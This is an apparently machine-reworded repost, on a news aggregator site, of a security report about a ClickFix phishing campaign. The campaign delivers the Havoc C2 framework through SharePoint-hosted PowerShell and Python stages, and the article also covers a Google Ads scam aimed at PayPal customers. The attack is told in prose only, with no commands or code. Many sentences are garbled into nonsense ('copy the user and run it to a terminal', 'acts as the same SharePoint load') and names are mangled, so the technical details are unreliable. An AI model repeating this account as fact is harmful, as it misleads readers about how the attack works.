Close Menu
  • Home
  • Identity
  • Inventions
  • Future
  • Science
  • Startups
  • Spanish
What's Hot

European VCs break taboos by investing in pure defense technology from the Ukrainian war zone

Langchain is about to become a unicorn, sources say

Glock is anti-Semitism again, and the sky is blue

Facebook X (Twitter) Instagram
  • Home
  • About Us
  • Advertise with Us
  • Contact Us
  • DMCA
  • Privacy Policy
  • Terms & Conditions
  • User-Submitted Posts
Facebook X (Twitter) Instagram
Fyself News
  • Home
  • Identity
  • Inventions
  • Future
  • Science
  • Startups
  • Spanish
Fyself News
Home » Hackers deploy PowerShell-based Havoc C2 via SharePoint sites using Clickfix Trick
Identity

Hackers deploy PowerShell-based Havoc C2 via SharePoint sites using Clickfix Trick

userBy userMarch 3, 2025No Comments2 Mins Read
Share Facebook Twitter Pinterest Telegram LinkedIn Tumblr Email Copy Link
Follow Us
Google News Flipboard
Share
Facebook Twitter LinkedIn Pinterest Email Copy Link

March 3, 2025Ravi LakshmananCybercrime/Malware

Click fix trick

Cybersecurity researchers are turning their attention to a new phishing campaign that employs the Clickfix technique to provide an open source command and control (C2) framework called Havoc.

“Threat actors hide each malware stage behind SharePoint sites and use a modified version of Havoc Demon in conjunction with the Microsoft Graph API to obscure C2 communications within trusted and well-known services.”

The starting point for the attack is a phishing email containing HTML attachments (“documents.html”) that displays an error message when opened. Use the click fix technique to copy the user and run it to a terminal or powershell, then delete the next stage.

Cybersecurity

This command is designed to download and run PowerShell scripts hosted on an adversarial SharePoint server. If the newly downloaded PowerShell does not already exist on your system, checks whether it is running within a sandbox environment before downloading the Python interpreter (“Pythonw.exe”).

HAVOC C2 via SharePoint Site

The next step is to get and run a Python script from the same SharePoint location that acts as the same SharePoint load, which acts as the shellcode loader for kaynldr ​​written in C and ASM, which can launch embedded DLLs.

“Threat actors use Havoc in conjunction with the MicrosoftQ Graph API to hide C2 communications within famous services,” Fortinet said, supporting the framework to gather information, perform file operations, execute commands and payloads, token operations, and Kerberos attacks.

The development comes as MalwareBytes revealed that threat actors continue to exploit known loopholes in their Google Ads policies, targeting PayPal customers with fake ads provided through advertiser accounts that may have compromised.

Cybersecurity

The ads are trying to trick victims searching for payments in order to call fraudulent numbers that end up handing over personal and financial information, looking for assistance related to account issues or payment concerns.

“A weakness within Google’s policy of landing pages (also known as the final URL) allows anyone to impersonate a popular website as long as the landing pages and display URLs (web pages displayed in the ads) share the same domain,” says Jérôme Segura, senior director of research at Malware Bytes.

“Tech support scammers are like vultures circling above the most popular Google search terms, especially when it comes to all kinds of online support and customer service.”

Did you find this article interesting? Follow us on Twitter and LinkedIn to read exclusive content you post.

Source link

Follow on Google News Follow on Flipboard
Share. Facebook Twitter Pinterest LinkedIn Tumblr Email Copy Link
Previous ArticleAt least one person was killed after a car drove into a crowd in Mannheim, Germany | Crime News
Next Article When Skype is closed, its legacy is mass end-to-end encryption
user
  • Website

Related Posts

Hackers use leaked shelter tool licenses to spread Lumma Stealer and Sectoprat malware

July 8, 2025

Anatsa Android Banking Trojan hits 90,000 users with fake PDF apps on Google Play

July 8, 2025

Malicious Pull Request Targets Over 6,000 Developers Target via Vulnerable Escode vs Code Extensions

July 8, 2025
Add A Comment
Leave A Reply Cancel Reply

Latest Posts

European VCs break taboos by investing in pure defense technology from the Ukrainian war zone

Langchain is about to become a unicorn, sources say

Glock is anti-Semitism again, and the sky is blue

Genai as a shopping assistant set that explodes during Prime Day sales

Trending Posts

Subscribe to News

Subscribe to our newsletter and never miss our latest news

Please enable JavaScript in your browser to complete this form.
Loading

Welcome to Fyself News, your go-to platform for the latest in tech, startups, inventions, sustainability, and fintech! We are a passionate team of enthusiasts committed to bringing you timely, insightful, and accurate information on the most pressing developments across these industries. Whether you’re an entrepreneur, investor, or just someone curious about the future of technology and innovation, Fyself News has something for you.

Robots Play Football in Beijing: A Glimpse into China’s Ambitious AI Future

TwinH: A New Frontier in the Pursuit of Immortality?

Meta’s Secret Weapon: The Superintelligence Unit That Could Change Everything 

Unlocking the Power of Prediction: The Rise of Digital Twins in the IoT World

Facebook X (Twitter) Instagram Pinterest YouTube
  • Home
  • About Us
  • Advertise with Us
  • Contact Us
  • DMCA
  • Privacy Policy
  • Terms & Conditions
  • User-Submitted Posts
© 2025 news.fyself. Designed by by fyself.

Type above and press Enter to search. Press Esc to cancel.